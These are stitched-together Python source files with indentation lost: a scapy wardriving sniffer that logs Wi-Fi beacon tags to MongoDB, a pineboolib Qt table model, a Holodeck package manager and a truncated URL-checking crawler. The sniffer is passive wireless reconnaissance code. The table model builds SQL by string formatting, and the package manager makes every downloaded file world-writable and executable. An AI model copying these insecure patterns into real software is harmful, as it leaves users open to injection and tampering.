dot11elt = pkt.getlayer(scapy.layers.dot11.Dot11Elt)
while dot11elt:
# print('ID:', dot11elt.ID, 'INFO:', dot11elt.info)
# Update session statistics
if str(dot11elt.ID) in _stats:
_stats[str(dot11elt.ID)] += 1
else:
_stats[str(dot11elt.ID)] = 1
# Update DB
_client.MFDoom.WarDriver.insert_one({
'TagID': dot11elt.ID,
'TagInfo': dot11elt.info
})
# Get next layer
dot11elt = dot11elt.payload.getlayer(scapy.layers.dot11.Dot11Elt)
def main():
global _client
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--iface', type=str, required=True, action='store', help="Interface to send/receive on")
parser.add_argument('-d', '--db', type=str, required=True, action='store', help="Database connection string for MongoDB instance")
args = parser.parse_args()
# Connect to the DB
_client = pymongo.MongoClient(args.db)
# Start the console-logger
threading.Thread(target=console).start()
# Sniff the packets
scapy.sendrecv.sniff(
iface=args.iface,
lfilter=lambda pkt: pkt.haslayer(scapy.layers.dot11.Dot11Elt),
prn=log_layers,
)
if __name__ == '__main__':
main() |
CursorTableModel.py | # # -*- coding: utf-8 -*-
import math, random
from pineboolib.flcontrols import ProjectClass
from pineboolib import decorators
from pineboolib.qsaglobals import ustr
import pineboolib
from PyQt4 import QtCore
from pineboolib.fllegacy.FLSqlQuery import FLSqlQuery
from pineboolib.fllegacy.FLFieldMetaData import FLFieldMetaData
from pineboolib.fllegacy.FLTableMetaData import FLTableMetaData
import traceback
import threading
import time, itertools
DEBUG = False
DisplayRole = QtCore.Qt.DisplayRole
EditRole = QtCore.Qt.EditRole
Horizontal = QtCore.Qt.Horizontal
Vertical = QtCore.Qt.Vertical
QVariant_invalid = None
QVariant = str()
QAbstractTableModel_headerData = QtCore.QAbstractTableModel.headerData
class CursorTableModel(QtCore.QAbstractTableModel):
rows = 15
cols = 5
_cursor = None
USE_THREADS = False
USE_TIMER = False
CURSOR_COUNT = itertools.count()
def __init__(self, action,project, *args):
super(CursorTableModel,self).__init__(*args)
from pineboolib.qsaglobals import aqtt
self._action = action
self._prj = project
if action and action.table:
self._table = project.tables[action.table]
self._metadata = project.conn.manager().metadata(self._table.name)
else:
raise AssertionError
self.sql_fields = []
self.field_aliases = []
self.field_type = []
self.field_metaData = []
# Indices de busqueda segun PK y CK. Los array "pos" guardan las posiciones
# de las columnas afectadas. PK normalmente valdrรก [0,].
# CK puede ser [] o [2,3,4] por ejemplo.
# En los IDX tendremos como clave el valor compuesto, en array, de la clave.
# Como valor del IDX tenemos la posicion de la fila.
# Si se hace alguna operaciรณn en _data como borrar filas intermedias hay
# que invalidar los indices. Opcionalmente, regenerarlos.
self.pkpos = []
self.ckpos = []
self.pkidx = {}
self.ckidx = {}
self.indexes_valid = False # Establecer a False otra vez si el contenido de los indices es errรณneo.
#for field in self._table.fields:
#if field.visible_grid:
#self.sql_fields.append(field.name())
#self.field_metaData.append(field)
# self.tableMetadata().addField(field)
self._data = []
self._vdata = []
self._column_hints = []
self.cols = len(self.tableMetadata().fieldListObject())
self.col_aliases = [ str(self.tableMetadata().indexFieldObject(i).alias()) for i in range(self.cols) ]
self.fetchLock = threading.Lock()
self.rows = 0
self.rowsLoaded = 0
self.where_filters = {}
self.pendingRows = 0
self.lastFetch = 0
self.fetchedRows = 0
self.threadFetcher = threading.Thread(target=self.threadFetch)
self.threadFetcherStop = threading.Event()
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.updateRows)
self.canFetchMore = True
if self.USE_TIMER == True:
self.timer.start(1000)
self.refresh()
def metadata(self):
#print("CursorTableModel: METADATA: " + self._table.name)
return self._metadata
def canFetchMore(self,index):
return self.canFetchMore
ret = self.rows > self.rowsLoaded
#print("canFetchMore: %r" % ret)
return ret
def data(self, index, role):
row = index.row()
col = index.column()
if role == DisplayRole or role == EditRole:
r = self._vdata[row]
if r is None:
r = [ str(x) for x in self._data[row] ]
self._vdata[row] = r
d = r[col]
#if row > self.rowsLoaded *0.95 - 200 and time.time() - self.lastFetch> 0.3: self.fetchMore(QtCore.QModelIndex())
#d = self._vdata[row*1000+col]
#if type(d) is str:
# d = QVariant(d)
# self._vdata[row*1000+col] = d
return d
return QVariant_invalid
def threadFetch(self):
#ct = threading.current_thread()
#print("Thread: FETCH (INIT)")
tiempo_inicial = time.time()
sql = """FETCH %d FROM %s""" % (2000,self._curname)
self._cursor.execute(sql)
tiempo_final = time.time()
if DEBUG:
if tiempo_final - tiempo_inicial > 0.2:
print("Thread: ", sql, "time: %.3fs" % (tiempo_final - tiempo_inicial))
def updateRows(self):
ROW_BATCH_COUNT = 200 if self.threadFetcher.is_alive() else 0
parent = QtCore.QModelIndex()
fromrow = self.rowsLoaded
torow = self.fetchedRows - ROW_BATCH_COUNT - 1
if torow - fromrow < 10: return
if DEBUG: print("Updaterows %s (UPDATE:%d)" % (self._table.name, torow - fromrow +1) )
self.beginInsertRows(parent, fromrow, torow)
self.rowsLoaded = torow + 1
self.endInsertRows()
#print("fin refresco modelo tabla %r , query %r, rows: %d %r" % (self._table.name, self._table.query_table, self.rows, (fromrow,torow)))
topLeft = self.index(fromrow,0)
bottomRight = self.index(torow,self.cols-1)
self.dataChanged.emit(topLeft,bottomRight)
def fetchMore(self,index):
tiempo_inicial = time.time()
#ROW_BATCH_COUNT = min(200 + self.rowsLoaded // 10, 1000)
ROW_BATCH_COUNT = 1000
parent = index
fromrow = self.rowsLoaded
torow = self.rowsLoaded + ROW_BATCH_COUNT # FIXME: Hay que borrar luego las que no se cargaron al final...
if self.fetchedRows - ROW_BATCH_COUNT - 1 > torow:
torow = self.fetchedRows - ROW_BATCH_COUNT - 1
#print("refrescando modelo tabla %r , query %r, rows: %d %r" % (self._table.name, self._table.query_table, self.rows, (fromrow,torow)))
if torow < fromrow: return
#print("QUERY:", sql)
if self.fetchedRows <= torow and self.canFetchMore:
if self.threadFetcher.is_alive(): self.threadFetcher.join()
c_all = self._cursor.fetchall()
newrows = len(c_all) #self._cursor.rowcount
from_rows = self.rows
self._data += c_all
self._vdata += [None] * newrows
self.fetchedRows+=newrows
self.rows += newrows
self.canFetchMore = newrows > 0
self.pendingRows = 0
self.indexUpdateRowRange((from_rows,self.rows))
self.threadFetcher = threading.Thread(target=self.threadFetch)
self.threadFetcher.start()
if torow > self.rows -1: torow = self.rows -1
if torow < fromrow: return
self.beginInsertRows(parent, fromrow, torow)
if fromrow == 0:
data_trunc = self._data[:200]
for row in data_trunc:
for r, val in enumerate(row):
txt = str(val)
ltxt = len(txt)
newlen = int(40 + math.tanh(ltxt/3000.0) * 35000.0)
self._column_hints[r] += newlen
for r in range(len(self._column_hints)):
self._column_hints[r] /= len(self._data[:200]) + 1
self._column_hints = [ int(x) for x in self._column_hints ]
self.indexes_valid = True
self.rowsLoaded = torow + 1
self.endInsertRows()
#print("fin refresco modelo tabla %r , query %r, rows: %d %r" % (self._table.name, self._table.query_table, self.rows, (fromrow,torow)))
topLeft = self.index(fromrow,0)
bottomRight = self.index(torow,self.cols-1)
self.dataChanged.emit(topLeft,bottomRight)
tiempo_final = time.time()
self.lastFetch = tiempo_final
if self.USE_THREADS == True and not self.threadFetcher.is_alive() and self.pendingRows > 0:
self.threadFetcher = threading.Thread(target=self.threadFetch)
self.threadFetcherStop = threading.Event()
self.threadFetcher.start()
if tiempo_final - tiempo_inicial > 0.2:
print("fin refresco tabla '%s' :: rows: %d %r :: (%.3fs)" % ( self._table.name, self.rows, (fromrow,torow), tiempo_final - tiempo_inicial))
def refresh(self):
parent = QtCore.QModelIndex()
oldrows = self.rowsLoaded
self.beginRemoveRows(parent, 0, oldrows )
self.threadFetcherStop.set()
if self.threadFetcher.is_alive(): self.threadFetcher.join()
self.rows = 0
self.rowsLoaded = 0
self.fetchedRows = 0
self.sql_fields = []
self.pkpos = []
self.ckpos = []
self._data = []
self.endRemoveRows()
if oldrows > 0:
self.rowsRemoved.emit(parent, 0, oldrows - 1)
where_filter = " "
for k, wfilter in sorted(self.where_filters.items()):
if wfilter is None: continue
wfilter = wfilter.strip()
if not wfilter: continue
if where_filter is " ":
where_filter = wfilter
else:
where_filter += " AND " + wfilter
if where_filter is " ":
where_filter = "1=1"
self._cursor = self._prj.conn.cursor()
# FIXME: Cuando la tabla es una query, aquรญ hay que hacer una subconsulta.
# TODO: Convertir esto a un cursor de servidor (hasta 20.000 registros funciona bastante bien)
if self._table.query_table:
# FIXME: Como no tenemos soporte para Queries, desactivamos el refresh.
print("No hay soporte para CursorTableModel con Queries: name %r , query %r" % (self._table.name, self._table.query_table))
return
for n,field in enumerate(self.tableMetadata().fieldListObject()):
#if field.visibleGrid():
# sql_fields.append(field.name())
if field.isPrimaryKey(): self.pkpos.append(n)
if field.isCompoundKey(): self.ckpos.append(n)
self.sql_fields.append(field.name())
self._curname = "cur_" + self._table.name + "_%08d" % (next(self.CURSOR_COUNT))
sql = """DECLARE %s NO SCROLL CURSOR WITH HOLD FOR SELECT %s FROM %s WHERE %s """ % (self._curname, ", ".join(self.sql_fields),self.tableMetadata().name(), where_filter)
#sql = """SELECT %s FROM %s WHERE %s """ % (", ".join(self.sql_fields),self.tableMetadata().name(), where_filter)
self._cursor.execute(sql)
sql = """FETCH %d FROM %s""" % (1000,self._curname)
self._cursor.execute(sql)
self.rows = 0
self.canFetchMore = True
#print("rows:", self.rows)
self.pendingRows = 0
self._column_hints = [120.0] * len(self.sql_fields)
#self.threadFetcher = threading.Thread(target=self.threadFetch)
#self.threadFetcherStop = threading.Event()
#self.threadFetcher.start()
self.fetchMore(parent)
def indexUpdateRow(self, rownum):
row = self._data[rownum]
if self.pkpos:
key = tuple([ row[x] for x in self.pkpos ])
self.pkidx[key] = rownum
if self.ckpos:
key = tuple([ row[x] for x in self.ckpos ])
self.ckidx[key] = rownum
def indexUpdateRowRange(self, rowrange):
rows = self._data[rowrange[0]:rowrange[1]]
if self.pkpos:
for n,row in enumerate(rows):
key = tuple([ row[x] for x in self.pkpos ])
self.pkidx[key] = n + rowrange[0]
if self.ckpos:
for n,row in enumerate(rows):
key = tuple([ row[x] for x in self.ckpos ])
self.ckidx[key] = n + rowrange[0]
def value(self, row, fieldname):
if row < 0 or row >= self.rows: return None
col = self.metadata().indexPos(fieldname)
campo = self._data[row][col]
"""
if self.metadata().field(fieldname).type() == "pixmap":
q = FLSqlQuery()
q.setSelect("contenido")
q.setFrom("fllarge")
q.setWhere("refkey == '%s'" % campo)
q.exec_()
q.first()
return q.value(0)
else:
return campo
"""
return campo
"""
value = None
if row < 0 or row >= self.rows: return value
try:
#col = self.sql_fields.index(fieldname)
col = self._prj.conn.manager.metadata(self._table.name).fieldIndex(fieldname)
except:
return value
if self.field_type[col] == 'pixmap':
campo = self._data[row][col]
cur = pineboolib.project.conn.cursor()
sql = "SELECT contenido FROM fllarge WHERE refkey ='%s'" % campo
cur.execute(sql)
for ret, in cur:
value = ret
else:
value = self._data[row][col]
return value
"""
def updateValuesDB(self, pKValue, dict_update):
row = self.findPKRow([pKValue])
if row is None:
raise AssertionError("Los indices del CursorTableModel no devolvieron un registro (%r)" % (pKValue))
if self.value(row, self.pK()) != pKValue:
raise AssertionError("Los indices del CursorTableModel devolvieron un registro erroneo: %r != %r" % (self.value(row, self.pK()), pKValue))
self.setValuesDict(row, dict_update)
pkey_name = self.tableMetadata().primaryKey()
# TODO: la conversion de mogrify de bytes a STR va a dar problemas con los acentos...
typePK_ = self.tableMetadata().field(self.tableMetadata().primaryKey()).type()
pKValue = self._prj.conn.manager().formatValue(typePK_, pKValue, False)
#if typePK_ == "string" or typePK_ == "pixmap" or typePK_ == "stringlist" or typePK_ == "time" or typePK_ == "date":
#pKValue = str("'" + pKValue + "'")
where_filter = "%s = %s" % (pkey_name, pKValue)
print("pkvalue = %r" % pKValue)
update_set = []
for key, value in dict_update.items():
type_ = self.tableMetadata().field(key).type()
#if type_ == "string" or type_ == "pixmap" or type_ == "stringlist" or type_ == "time" or type_ == "date":
#value = str("'" + value + "'")
value = self._prj.conn.manager().formatValue(type_, value, False)
#update_set.append("%s = %s" % (key, (self._cursor.mogrify("%s",[value]))))
update_set.append("%s = %s" % (key, value))
print("field %r = %r" % (key,value))
update_set_txt = ", ".join(update_set)
sql = """UPDATE %s SET %s WHERE %s RETURNING *""" % (self.tableMetadata().name(), update_set_txt, where_filter)
print("MODIFYING SQL :: ", sql)
self._cursor.execute(sql)
returning_fields = [ x[0] for x in self._cursor.description ]
for orow in self._cursor:
dict_update = dict(zip(returning_fields, orow))
self.setValuesDict(row, dict_update)
"""
Asigna un valor una fila usando un diccionario
@param row. Columna afectada
@param update_dict. array clave-valor indicando el listado de claves y valores a actualizar
"""
@decorators.BetaImplementation
def setValuesDict(self, row, update_dict):
if DEBUG: print("CursorTableModel.setValuesDict(row %s) = %r" % (row, update_dict))
try:
if isinstance(self._data[row], tuple):
self._data[row] = list(self._data[row])
r = self._vdata[row]
if r is None:
r = [ str(x) for x in self._data[row] ]
self._vdata[row] = r
colsnotfound = []
for fieldname,value in update_dict.items():
#col = self.metadata().indexPos(fieldname)
try:
col = self.sql_fields.index(fieldname)
self._data[row][col] = value
r[col] = value
except ValueError:
colsnotfound.append(fieldname)
if colsnotfound:
print("CursorTableModel.setValuesDict:: columns not found: %r" % (colsnotfound))
self.indexUpdateRow(row)
except Exception:
print("CursorTableModel.setValuesDict(row %s) = %r :: ERROR:" % (row, update_dict), traceback.format_exc())
"""
Asigna un valor una celda
@param row. Columna afectada
@param fieldname. Nonbre de la fila afectada. Se puede obtener la columna con self.metadata().indexPos(fieldname)
@param value. Valor a asignar. Puede ser texto, pixmap, etc...
"""
def setValue(self, row, fieldname, value):
# Reimplementaciรณn para que todo pase por el mรฉtodo genรฉrico.
self.setValuesDict(self, row, { fieldname : value } )
"""
Dibuja el valor correcto
"""
def paintCell(self, format_, value):
print("Dibujando formato", format_)
return QtCore.QVariant(ustr(value))
"""
Crea una nueva linea en el tableModel
@param buffer . PNBuffer a aรฑadir
"""
@decorators.NotImplementedWarn
def newRowFromBuffer(self, buffer):
try:
if DEBUG: print("CursorTableModel.newRowFromBuffer")
return
colsnotfound = []
self._data.append([])
self._vdata.append([])
newRow = self.rowCount()
for fieldBuffer in buffer.fieldsList():
#col = self.metadata().indexPos(fieldname)
try:
#col = self.sql_fields.index(fieldBuffer.name)
#self._data++#Nueva linea
self._data[newRow].append(fieldBuffer.value)
self._vdata[newRow].append(fieldBuffer.value)
except ValueError:
colsnotfound.append(fieldBuffer.name)
if colsnotfound:
print("CursorTableModel.newRowFromBuffer:: columns not found: %r" % (colsnotfound))
self.indexUpdateRow(newRow)
except Exception:
print("CursorTableModel.newRowFromBuffer(row %s) :: ERROR:" % newRow, traceback.format_exc())
def findPKRow(self, pklist):
if not isinstance(pklist, (tuple, list)):
raise ValueError("findPKRow expects a list as first argument. Enclose PK inside brackets [self.pkvalue]")
if not self.indexes_valid:
for n in range(self.rows):
self.indexUpdateRow(n)
self.indexes_valid = True
pklist = tuple(pklist)
if pklist not in self.pkidx:
print("CursorTableModel.findPKRow:: PK not found: %r (requires list, not integer or string)" % pklist)
return None
return self.pkidx[pklist]
def findCKRow(self, cklist):
if not isinstance(cklist, (tuple, list)):
raise ValueError("findCKRow expects a list as first argument.")
if not self.indexes_valid:
for n in range(self.rows):
self.indexUpdateRow(n)
self.indexes_valid = True
cklist = tuple(cklist)
if cklist not in self.ckidx:
print("CursorTableModel.findCKRow:: CK not found: %r (requires list, not integer or string)" % cklist)
return None
return self.ckidx[cklist]
def pK(self): #devuelve el nombre del campo pk
return self.tableMetadata().primaryKey()
#return self._pk
def fieldType(self, fieldName): # devuelve el tipo de campo
field = self.tableMetadata().field(fieldName)
if field:
return field.type()
else:
return None
"""
value = None
try:
if not fieldName is None:
value = self.field_metaData[self.sql_fields.index(fieldName)].type()
else:
value = None
return value
except:
print("CursorTableModel: No se encuentra el campo %s" % fieldName)
return None
"""
def alias(self, fieldName):
return self.tableMetadata().field(fieldName).alias()
"""
value = None
try:
value = self.field_metaData[self.sql_fields.index(fieldName)].alias()
return value
except:
return value
"""
def columnCount(self, parent = None):
return self.cols
if parent is None: parent = QtCore.QModelIndex()
if parent.isValid(): return 0
#print(self.cols)
print("colcount", self.cols)
return self.cols
def rowCount(self, parent = None):
return self.rowsLoaded
if parent is None: parent = QtCore.QModelIndex()
if parent.isValid(): return 0
print("rowcount", self.rows)
return self.rows
def headerData(self, section, orientation, role):
if role == DisplayRole:
if orientation == Horizontal:
return self.col_aliases[section]
elif orientation == Vertical:
return section +1
return QVariant_invalid
return QAbstractTableModel_headerData(self, section, orientation, role)
def fieldMetadata(self, fieldName):
return self.tableMetadata().field(fieldName)
"""
try:
pos = self.field_metaData(fieldName)
return self.field_metaData[pos]
except:
return False
#print("CursorTableModel: %s.%s no hay datos" % ( self._table.name, fieldName ))
"""
def tableMetadata(self):
return self._prj.conn.manager().metadata(self._table.name)
|
packagemanager.py | """Package manager for worlds available to download and use for Holodeck"""
import json
import os
import shutil
import sys
import tempfile
import urllib.request
import urllib.error
import fnmatch
import zipfile
import pprint
from queue import Queue
from threading import Thread
from holodeck import util
from holodeck.exceptions import HolodeckException, NotFoundException
BACKEND_URL = "https://s3.amazonaws.com/holodeckworlds/"
def _get_from_backend(rel_url):
"""
Gets the resource given at rel_url, assumes it is a utf-8 text file
Args:
rel_url (:obj:`str`): url relative to BACKEND_URL to fetch
Returns:
:obj:`str`: The resource at rel_url as a string
"""
req = urllib.request.urlopen(BACKEND_URL + rel_url)
data = req.read()
return data.decode('utf-8')
def available_packages():
"""Returns a list of package names available for the current version of Holodeck
Returns (:obj:`list` of :obj:`str`):
List of package names
"""
# Get the index json file from the backend
url = "packages/{ver}/available".format(ver=util.get_holodeck_version())
try:
index = _get_from_backend(url)
index = json.loads(index)
except urllib.error.URLError as err:
print("Unable to communicate with backend ({}), {}".format(
url, err.reason),
file=sys.stderr)
raise
return index["packages"]
def installed_packages():
"""Returns a list of all installed packages
Returns:
:obj:`list` of :obj:`str`: List of all the currently installed packages
"""
_check_for_old_versions()
return [x["name"] for x, _ in _iter_packages()]
def package_info(pkg_name):
"""Prints the information of a package.
Args:
pkg_name (:obj:`str`): The name of the desired package to get information
"""
indent = " "
for config, _ in _iter_packages():
if pkg_name == config["name"]:
print("Package:", pkg_name)
print(indent, "Platform:", config["platform"])
print(indent, "Version:", config["version"])
print(indent, "Path:", config["path"])
print(indent, "Worlds:")
for world in config["worlds"]:
world_info(world["name"], world_config=world, base_indent=4)
def _print_agent_info(agents, base_indent=0):
print(base_indent*' ', "Agents:")
base_indent += 2
for agent in agents:
print(base_indent*' ', "Name:", agent["agent_name"])
print(base_indent*' ', "Type:", agent["agent_type"])
print(base_indent*' ', "Sensors:")
for sensor in agent["sensors"]:
print((base_indent + 2)*' ', sensor)
def world_info(world_name, world_config=None, base_indent=0):
"""Gets and prints the information of a world.
Args:
world_name (:obj:`str`): the name of the world to retrieve information for
world_config (:obj:`dict`, optional): A dictionary containing the world's configuration.
Will find the config if None. Defaults to None.
base_indent (:obj:`int`, optional): How much to indent output
"""
if world_config is None:
for config, _ in _iter_packages():
for world in config["worlds"]:
if world["name"] == world_name:
world_config = world
if world_config is None:
raise HolodeckException("Couldn't find world " + world_name)
print(base_indent*' ', world_config["name"])
base_indent += 4
if "agents" in world_config:
_print_agent_info(world_config["agents"], base_indent)
print(base_indent*' ', "Scenarios:")
for scenario, _ in _iter_scenarios(world_name):
scenario_info(scenario=scenario, base_indent=base_indent + 2)
def _find_file_in_worlds_dir(filename):
"""
Recursively tries to find filename in the worlds directory of holodeck
Args:
filename (:obj:`str`): Pattern to try and match (fnmatch)
Returns:
:obj:`str`: The path or an empty string if the file was not found
"""
for root, _, filenames in os.walk(util.get_holodeck_path(), "worlds"):
for match in fnmatch.filter(filenames, filename):
return os.path.join(root, match)
return ""
def scenario_info(scenario_name="", scenario=None, base_indent=0):
"""Gets and prints information for a particular scenario file
Must match this format: scenario_name.json
Args:
scenario_name (:obj:`str`): The name of the scenario
scenario (:obj:`dict`, optional): Loaded dictionary config
(overrides world_name and scenario_name)
base_indent (:obj:`int`, optional): How much to indent output by
"""
scenario_file = ""
if scenario is None:
# Find this file in the worlds/ directory
filename = '{}.json'.format(scenario_name)
scenario_file = _find_file_in_worlds_dir(filename)
if scenario_file == "":
raise FileNotFoundError("The file {} could not be found".format(filename))
scenario = load_scenario_file(scenario_file)
print(base_indent*' ', "{}-{}:".format(scenario["world"], scenario["name"]))
base_indent += 2
if "agents" in scenario:
_print_agent_info(scenario["agents"], base_indent)
def install(package_name, url=None):
"""Installs a holodeck package.
Args:
package_name (:obj:`str`): The name of the package to install
"""
if package_name is None and url is None:
raise HolodeckException("You must specify the URL or a valid package name")
_check_for_old_versions()
holodeck_path = util.get_holodeck_path()
if url is None:
# If the URL is none, we need to derive it
packages = available_packages()
if package_name not in packages:
print("Package not found. Available packages are:", file=sys.stderr)
pprint.pprint(packages, width=10, indent=4, stream=sys.stderr)
return
# example: %backend%/packages/0.1.0/DefaultWorlds/Linux.zip
url = "{backend_url}packages/{holodeck_version}/{package_name}/{platform}.zip".format(
backend_url=BACKEND_URL,
holodeck_version=util.get_holodeck_version(),
package_name=package_name,
platform=util.get_os_key())
install_path = os.path.join(holodeck_path, "worlds", package_name)
print("Installing {} from {} to {}".format(package_name, url, install_path))
_download_binary(url, install_path)
def _check_for_old_versions():
"""Checks for old versions of the binary and tells the user they can remove them.
If there is an ignore_old_packages file, it will stay silent.
"""
# holodeckpath turns off the binary folder versioning
if "HOLODECKPATH" in os.environ:
return
path = util._get_holodeck_folder()
if not os.path.exists(path):
return
not_matching = []
for f in os.listdir(path):
f_path = os.path.join(path, f)
if f == "ignore_old_packages":
return
if f == util.get_holodeck_version():
continue
elif not os.path.isfile(f_path):
not_matching.append(f)
if not_matching:
print("**********************************************")
print("* You have old versions of Holodeck packages *")
print("**********************************************")
print("Use packagemanager.prune() to delete old packages")
print("Versions:", not_matching)
print("Place an `ignore_old_packages` file in {} to surpress this message".format(path))
print()
def prune():
"""Prunes old versions of holodeck, other than the running version.
**DO NOT USE WITH HOLODECKPATH**
Don't use this function if you have overidden the path.
"""
if "HOLODECKPATH" in os.environ:
print("This function is not available when using HOLODECKPATH", stream=sys.stderr)
return
holodeck_folder = util._get_holodeck_folder()
# Delete everything in holodeck_folder that isn't the current holodeck version
for file in os.listdir(holodeck_folder):
file_path = os.path.join(holodeck_folder, file)
if os.path.isfile(file_path):
continue
if file == util.get_holodeck_version():
continue
# Delete it!
print("Deleting {}".format(file_path))
shutil.rmtree(file_path)
print("Done")
def remove(package_name):
"""Removes a holodeck package.
Args:
package_name (:obj:`str`): the name of the package to remove
"""
for config, path in _iter_packages():
if config["name"] == package_name:
shutil.rmtree(path)
def remove_all_packages():
"""Removes all holodeck packages.
"""
for _, path in _iter_packages():
shutil.rmtree(path)
def load_scenario_file(scenario_path):
"""
Loads the scenario config file and returns a dictionary containing the configuration
Args:
scenario_path (:obj:`str`): Path to the configuration file
Returns:
:obj:`dict`: A dictionary containing the configuration file
"""
with open(scenario_path, 'r') as f:
return json.load(f)
def get_scenario(scenario_name):
"""Gets the scenario configuration associated with the given name
Args:
scenario_name (:obj:`str`): name of the configuration to load - eg "UrbanCity-Follow"
Must be an exact match. Name must be unique among all installed packages
Returns:
:obj:`dict`: A dictionary containing the configuration file
"""
config_path = _find_file_in_worlds_dir(scenario_name + ".json")
if config_path == "":
raise FileNotFoundError(
"The file `{file}.json` could not be found in {path}. "
"Make sure the package that contains {file} " \
"is installed.".format(file=scenario_name, path=util.get_holodeck_path()))
return load_scenario_file(config_path)
def get_binary_path_for_package(package_name):
"""Gets the path to the binary of a specific package.
Args:
package_name (:obj:`str`): Name of the package to search for
Returns:
:obj:`str`: Returns the path to the config directory
Raises:
NotFoundException: When the package requested is not found
"""
for config, path in _iter_packages():
try:
if config["name"] == package_name:
return os.path.join(path, config["path"])
except KeyError as e:
print("Error parsing config file for {}".format(path))
raise NotFoundException("Package `{}` not found!".format(package_name))
def get_binary_path_for_scenario(scenario_name):
"""Gets the path to the binary for a given scenario name
Args:
scenario_name (:obj:`str`): name of the configuration to load - eg "UrbanCity-Follow"
Must be an exact match. Name must be unique among all installed packages
Returns:
:obj:`dict`: A dictionary containing the configuration file
"""
scenario_path = _find_file_in_worlds_dir(scenario_name + ".json")
root = os.path.dirname(scenario_path)
config_path = os.path.join(root, "config.json")
with open(config_path, 'r') as f:
config = json.load(f)
return os.path.join(root, config["path"])
def get_package_config_for_scenario(scenario):
"""For the given scenario, returns the package config associated with it (config.json)
Args:
scenario (:obj:`dict`): scenario dict to look up the package for
Returns:
:obj:`dict`: package configuration dictionary
"""
world_name = scenario["world"]
for config, path in _iter_packages():
for world in config["worlds"]:
if world["name"] == world_name:
return config
raise HolodeckException("Could not find a package that contains world {}".format(world_name))
def _iter_packages():
path = util.get_holodeck_path()
worlds_path = os.path.join(path, "worlds")
if not os.path.exists(worlds_path):
os.makedirs(worlds_path)
for dir_name in os.listdir(worlds_path):
full_path = os.path.join(worlds_path, dir_name)
if os.path.isdir(full_path):
for file_name in os.listdir(full_path):
if file_name == "config.json":
with open(os.path.join(full_path, file_name), 'r') as f:
config = json.load(f)
yield config, full_path
def _iter_scenarios(world_name):
"""Iterates over the scenarios associated with world_name.
Note that world_name needs to be unique among all packages
Args:
world_name (:obj:`str`): name of the world
Returns: config_dict, path_to_config
"""
# Find a scenario for this world
a_scenario = _find_file_in_worlds_dir("{}-*".format(world_name))
if a_scenario is None:
return
# Find the parent path of that file
world_path = os.path.abspath(os.path.join(a_scenario, os.pardir))
if not os.path.exists(world_path):
os.makedirs(world_path)
for file_name in os.listdir(world_path):
if file_name == "config.json":
continue
if not file_name.endswith(".json"):
continue
if not fnmatch.fnmatch(file_name, "{}-*.json".format(world_name)):
continue
full_path = os.path.join(world_path, file_name)
with open(full_path, 'r') as f:
config = json.load(f)
yield config, full_path
def _download_binary(binary_location, install_location, block_size=1000000):
def file_writer_worker(tmp_fd, length, queue):
max_width = 20
percent_per_block = 100 // max_width
amount_written = 0
while amount_written < length:
tmp_fd.write(queue.get())
amount_written += block_size
percent_done = 100 * amount_written / length
int_percent = int(percent_done)
num_blocks = int_percent // percent_per_block
blocks = chr(0x2588) * num_blocks
spaces = " " * (max_width - num_blocks)
try:
sys.stdout.write("\r|" + blocks + spaces + "| %d%%" % int_percent)
except UnicodeEncodeError:
print("\r" + str(int_percent) + "%", end="")
sys.stdout.flush()
queue = Queue()
tmp_fd = tempfile.TemporaryFile(suffix=".zip")
with urllib.request.urlopen(binary_location) as conn:
file_size = int(conn.headers["Content-Length"])
print("File size:", util.human_readable_size(file_size))
amount_read = 0
write_thread = Thread(target=file_writer_worker, args=(tmp_fd, file_size, queue))
write_thread.start()
while amount_read < file_size:
queue.put(conn.read(block_size))
amount_read += block_size
write_thread.join()
print()
# Unzip the binary
# Note the contents of the ZIP file get extracted straight into the install directory, so the
# zip's structure should look like file.zip/config.json not file.zip/file/config.json
print("Unpacking worlds...")
with zipfile.ZipFile(tmp_fd, 'r') as zip_file:
zip_file.extractall(install_location)
if os.name == "posix":
print("Fixing Permissions")
_make_excecutable(install_location)
print("Finished.")
def _make_excecutable(install_path):
for path, _, files in os.walk(install_path):
for f in files:
os.chmod(os.path.join(path, f), 0o777)
|
crawler.py | #!/usr/bin/env python
import certifi
import google as google
import requests
import yaml
import firebase_admin
import hashlib
import threading
from googlesearch import search
from firebase_admin import credentials
from firebase_admin import firestore
from datetime import datetime
from urllib.parse import urlsplit
###############
# GLOBAL VARS #
###############
verbose_logging = False
# Simple way to create a structured way of printing log statements.
def log_print(msg, status='notice'):
prefix = ''
suffix = ''
if status == 'error':
print(prefix + '[ERROR]: ' + msg + suffix)
elif status == 'notice':
print(prefix + '[NOTICE]: ' + msg + suffix)
elif status == 'critical':
print(prefix + '[CRITICAL]: ' + msg + suffix)
elif status == 'success' or status == 'ok':
print(prefix + '[OK]: ' + msg + suffix)
elif status == 'none':
print(msg)
else:
print(prefix + '[NOTICE]: ' + msg + suffix)
######################
# CONFIG SEARCH INIT #
######################
print('Started at: ' + str(datetime.now()))
log_print('Initialising configuration file.')
config = ''
with open("crawler_config.yml", 'r') as config_stream:
try:
config = yaml.load(config_stream)
# Log that the config was loaded successfully.
log_print('Configuration loaded', 'success')
except yaml.YAMLError as exc:
log_print('Failed to initialise the configuration.', 'critical')
print(exc)
#################
# FIREBASE INIT #
#################
log_print('Initialising Firebase configuration')
service_account_json_path = config['firebase']['service_account_json_path']
db_collection = config['firebase']['collection_name']
cred = credentials.Certificate(service_account_json_path)
default_app = firebase_admin.initialize_app(cred)
db = firestore.client()
#####################
# GENERAL FUNCTIONS #
#####################
def request_url(url):
try:
r = requests.get(url, verify=certifi.where(), allow_redirects=True, timeout=10)
if verbose_logging:
print(r.url)
print(r.status_code)
print(r.history)
return [1, r.url, r.status_code, r.history]
except requests.exceptions.SSLError as error:
if verbose_logging:
print(error)
return [2, None, None, None]
except requests.exceptions.RequestException as error:
if verbose_logging:
print(error)
return [3, None, None, None]
except requests.exceptions.ConnectTimeout as error:
if verbose_logging:
print(error)
return [3, None, None, None]
except:
return [3, None, None, None]
# Where the magic happens.
def verify_url(url):
# Strip off the http(s) part of the url if present.
if 'https://' in url:
url = url.replace('https://', '')
elif 'http://' in url:
url = url.replace('http://', '')
# Strip of any trailing or leading slashes
url = url.strip('/')
log_print('Verifying URL: ' + url, 'ok')
http_result = request_url('http://' + url)
https_result = request_url('https://' + url)
# Actual logic to determine if the url is safe or not.
safe_to_visit = False
# If we got an RequestException on both levels, we have a dead url most certainly
if https_result[0] == 3 and http_result[0] == 3:
safe_to_visit = None
# If the https request failed, but http works, it's considered unsafe.
